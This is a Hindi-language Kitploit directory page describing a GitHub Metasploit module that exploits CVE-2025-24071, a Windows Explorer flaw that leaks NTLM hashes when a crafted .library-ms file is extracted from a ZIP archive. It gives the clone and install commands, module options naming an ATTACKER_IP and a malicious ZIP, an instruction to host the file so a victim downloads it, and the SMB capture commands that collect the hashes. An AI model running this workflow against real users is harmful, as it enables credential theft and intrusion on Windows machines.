Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24071-msfvenom — Metasploit मॉड्यूल CVE-2025-24071 के लिए - .library-ms के माध्यम से Windows NTLM हैश लीक | Kitploit
उपकरण/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
शोषण फ्रेमवर्कपासवर्ड हमलेपेलोड जनरेशनभेद्यता विश्लेषणशोषण
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

Metasploit मॉड्यूल CVE-2025-24071 के लिए - .library-ms के माध्यम से Windows NTLM हैश लीक

रिपॉजिटरी देखें
2551 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24071: NTLM हैश लीक .library-ms फ़ाइल के माध्यम से (Metasploit मॉड्यूल)

इस रिपॉजिटरी में CVE-2025-24071 का शोषण करने के लिए एक Metasploit मॉड्यूल है, जो Windows Explorer में एक कमजोरी है जो एक दुर्भावनापूर्ण .library-ms फ़ाइल को ZIP आर्काइव से निकालने पर NTLM हैश लीक करती है।

द्वारा विकसित: FOLKS-IWD


अवलोकन

यह कमजोरी तब होती है जब कोई उपयोगकर्ता एक ZIP आर्काइव निकालता है जिसमें एक विशेष रूप से तैयार किया गया .library-ms फ़ाइल होता है। Windows Explorer स्वचालित रूप से फ़ाइल में निर्दिष्ट एक रिमोट सर्वर पर SMB प्रमाणीकरण अनुरोध शुरू करता है, जिससे उपयोगकर्ता का NTLM हैश बिना किसी उपयोगकर्ता इंटरैक्शन के लीक हो जाता है।

यह Metasploit मॉड्यूल:

  1. एक दुर्भावनापूर्ण .library-ms फ़ाइल उत्पन्न करता है।
  2. इसे एक ZIP आर्काइव में पैक करता है।
  3. NTLM हैश एकत्र करने के लिए Metasploit के SMB कैप्चर कार्यक्षमता के साथ एकीकृत होता है। image

स्थापना

  1. रिपॉजिटरी को क्लोन करें:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. मॉड्यूल को अपने Metasploit मॉड्यूल निर्देशिका में कॉपी करें:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

उपयोग

  1. मॉड्यूल लोड करें:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. आवश्यक विकल्प सेट करें:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. मॉड्यूल चलाएँ :
root@kitploit:~
  run
  1. मॉड्यूल एक दुर्भावनापूर्ण ZIP फ़ाइल (exploit.zip) उत्पन्न करेगा। इस फ़ाइल को होस्ट करें ताकि पीड़ित इसे डाउनलोड और निकाल सके।
  2. NTLM हैश एकत्र करने के लिए Metasploit के SMB कैप्चर मॉड्यूल का उपयोग करें:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
टूल डाउनलोड करें